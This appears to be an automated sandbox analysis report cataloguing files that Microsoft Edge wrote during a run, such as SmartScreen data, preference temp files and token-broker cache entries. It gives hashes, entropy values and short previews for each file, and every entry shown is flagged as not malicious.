SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.035082680587232
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclRcD2fn:YWLSGTt1o9LuLgfGBPAzkVj/T8laKfn
MD5:	7FC4C5E56FB244B919A06A3E0C4DDBA8
SHA1:	83E3CE2CC3091CB1EA9C7BA1D05DE8C1A5187246
SHA-256:	2A459B560EE62B25422AE8A58215CE259D50EAB1AF3DDD33B2B9221A95EB2DF8
SHA-512:	9147E41A0D400260AC3FBBF1015D30ADA4ACB07A67D580946A8148286441DC3661587ECDC73FA4F76F1B446E44A31EA812E4C9CD8F454ED33DEF8DD87631D005
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734653367476859}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
MD5:	F732DBED9289177D15E236D0F8F2DDD3
SHA1:	53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
SHA-256:	2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
SHA-512:	B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ac98f650-1fd2-40af-b8ad-78860033788c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	60292
Entropy (8bit):	6.101357238638629
Encrypted:	false
SSDEEP:	1536:FMk1rT8H1nDCBS2qX7bwtxr3odgorQXdbih:FMYrT8VDkS20EbZXdbC
MD5:	C3E54A9F79B5646DE50B05818B1DA241
SHA1:	5093EB92DC2552DD0D0B1ABFBB80C5FF00007932
SHA-256:	79B9E5AD6836D95CA21AE0F5BAC387185A620A59DC0777B3847D4E2D724C43A1
SHA-512:	B19B99B4E3755DFCDE2DC288A2D039044C18A669F51D2C7E6096F94EE2422818291EE71095C7727CE9E6FFB1BE53F7F15A10587C7D35580BADA2B36E38B444CD
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"822611d5-8122-4288-8c00-e3c163d29313"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552567"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ca2e73d8-3fc4-4ef4-ba2b-faea4817d3fd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
Entropy (8bit):	6.101664206419602
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynQCBS2qX7bltPHgorQXdbiR3oM:z/0+zI7ynQkS201tP0Xdbe3
MD5:	55F765454974C8C1DE5455DD5AAE690E
SHA1:	809AA4EAA7D787DF8FA22E45C4BAB099814F8952
SHA-256:	5AF3F33591CBB5B8BD8AE7E036FAB30F943B297BD0A262DEB7ECDF9DCA551B97
SHA-512:	CF9003D5879A82076AC93658C3BF97EAFB829B9D7E77FB6572D4E4918E196B9E9C2CB2D59B71751F53D3BF48F985BFA8DA2CD5021995E4DA88654B572B5A6CDF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d4b84431-dcab-44ff-b9eb-9fbcedb7269e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58916
Entropy (8bit):	6.104555078601068
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynJCBS2qX7b5wgorQXdbiR3oM:z/0+zI7ynJkS20fXdbe3
MD5:	4C335B0A73C83B05BAE13E894D953DBF
SHA1:	CA530241E5118ABD95F9064D036E4D3834FD7EEC
SHA-256:	32CB4C74E012437F7BC2234CBCD3D13855D28C0F1140698992EB80B05879EC1E
SHA-512:	47A5A97D190E1700AE0AF087C6C88AC46B14E9D807A13B02CDCF95C9C284F1E03814B95BEC2F8AC18FBAA6D74DEA2A965307FC28AFFF1770394BED1B1AC009C2
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fa29d556-3f43-4891-b8f7-a4a6e265635c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	60245
Entropy (8bit):	6.101486489063746
Encrypted:	false
SSDEEP:	1536:FMk1rT8H1nnCBS2qX7bwtxr3odgorQXdbih:FMYrT8VnkS20EbZXdbC
MD5:	AC4F7A84215F53B309546FB120A535ED
SHA1:	D4277B758F47E186BEB525CAE13DA2EBC20C912D
SHA-256:	C316800D3CDC99A4FC988B825ACAC728CBF1B024742855A7FA7C38C40CE25135
SHA-512:	2B18CAC4562896C5B7243CBCA0871B33B51B2AB3A420F687D502DC3D1D19F4534C01B0822DA4D9CD69504B438CE4BE1B21A9A8AEF18CEBA0769676CBA9BA5F4A
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"822611d5-8122-4288-8c00-e3c163d29313"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552567"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fd7fcc27-2928-41b9-a133-31d0395e333e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58998
Entropy (8bit):	6.1045675012221805
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yOYCBS2qX7bwwgorQXdbiR3oM:z/0+zI7yOYkS202Xdbe3
MD5:	D45ABAED3F37D1C6CF51E110FFD91706
SHA1:	D21042C1524E00F08E723280EE0B9507A4B5FADE
SHA-256:	2B9ED7C2CD9CCC107FA1C9581CE9E08B76129669344298010A36429EC0A30059
SHA-512:	91D0DB92D960A31306EB4FA0853C9352397A60C6707AE81A3A8E8D0A286A1C9F507C47FE6704239500CA9785AF32D05279A8C6C1A50502EE3B3A35C59B3693B6
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8434986912162765
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxgJxl9Il8uWayzB2ljth6kpdfb1900SGIdd1rc:mxYtkApDzh900SGd
MD5:	47E669C12AF034A4E3461E04D082DFAE
SHA1:	8E15A2DF983E11CE941F1F425E7B8BD40D905702
SHA-256:	208277BED86B2DEFBD9812273598651FEDA6479BCB4BDC372BB5E91E05ECB402
SHA-512:	2F69B3AD17A71A5FF4F08766E78FA7975D89A50C9F4748A37774A556D05F7AE1164A29378E8726401C831962178549AB67126060BBADA27703DB1C2D9EF16604
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.d.r.H.p.F.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.g.a.N.o.8.r.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.994163379816048
Encrypted:	false
SSDEEP:	96:0YMLDl07DuuskPcecwRAWchbFnxsslQijIbty:0rLx0GPCJQWchMMQosy
MD5:	CEB01E4BB00A7818E6FB20E88D7AE9D2
SHA1:	212C6DDEE904622739B0C88E3F768D19ED670CC8
SHA-256:	03A161579AA4EEE8D60637EC909774372DDF9A60B5608E3D17C2A1567410B5DA
SHA-512:	9568D3BC9BB821D35DC43A78434DA0797CBE23249F5FADB46E50D90889705CB838EA2DCDFDE7EE9EB9FD480C424AE898898C701CA05F3022222D1F1BA80BEEF3
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".t.x.k.v.B.I.l.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.g.a.N.o.8.r.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.9024830965886084
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xTxl9Il8uWlxGamj2kinQmm1Lh7RRDonOyqd/vc:aNYKxlmj2koQxtRDoD3
MD5:	6A0F4ECC81E8ECEC1055706D00246670
SHA1:	59F9426B6C09B2DFC615E47DDE6A3CA484522847
SHA-256:	5A065178861F53512536693D4C2E0AAD6BEA9C7499F6201D2617819CFFD2A880
SHA-512:	C629209FD0FAC9BE9E752A4C7D82C93A75F5E9AE5EABB6717762B70BF9F4A1F63097536052BFA7C40EAF0BC12B94BCAF6F8DFC777B86084C4D3AA67F4758F039
Malicious:	false
